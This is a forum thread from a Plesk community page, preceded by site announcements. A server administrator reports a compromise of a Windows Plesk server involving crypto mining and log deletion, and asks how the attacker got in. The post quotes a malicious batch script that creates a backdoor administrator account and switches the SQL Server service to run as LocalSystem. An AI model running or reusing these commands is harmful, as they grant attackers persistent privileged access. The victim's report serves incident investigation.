• Our team is looking to connect with folks who use email services provided by Plesk, or a premium service. If you'd like to be part of the discovery process and share your experiences, we invite you to complete this short screening survey. If your responses match the persona we are looking for, you'll receive a link to schedule a call at your convenience. We look forward to hearing from you!
  • We are looking for U.S.-based freelancer or agency working with SEO or WordPress for a quick 30-min interviews to gather feedback on XOVI, a successful German SEO tool we’re looking to launch in the U.S.
    If you qualify and participate, you’ll receive a $30 Amazon gift card as a thank-you. Please apply here. Thanks for helping shape a better SEO product for agencies!
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

Issue security issue on windows server 2019 to 2012

httpdocs

New Pleskian
in my windows server with plesk obsidian and mssql 2019
I feel like I've been attacked by malware. There are two files in the C:\ProgramData\Application\Windows. File named runtime.bat with the following content:

Code:
net user PleskDeploy 123_Hoho /add & net localgroup administrators PleskDeploy /add
sc.exe config MSSQLSERVER obj= LocalSystem password= ""

sc stop MSSQLServer

sc start MSSQLServer


This is a hosting server.
The hacker enters the server through the bug of a website.
Transfers an executable file to C:\ProgramData\
With the access of the administrator, run this file and use the server for crypto mining.
In addition, a process called SERVICES.EXE engages all server memory. A user named PleskAdmin$ is created on the server with administrator access and is automatically deleted. plesk is installed on this server. Event Log also records a person's login report with the username PleskAdmin$ and deletes its logs.

Server and Plesk are completely updated.
No other software is installed on the server.
No such problem has been reported so far.

Now the question is:
How to transfer the file to the C:\ProgramData\ folder?
How to get administrator access in this folder and run the file?

This problem only occurs on Plesk servers,websitepanel server servers are without problems.
 
Back
Top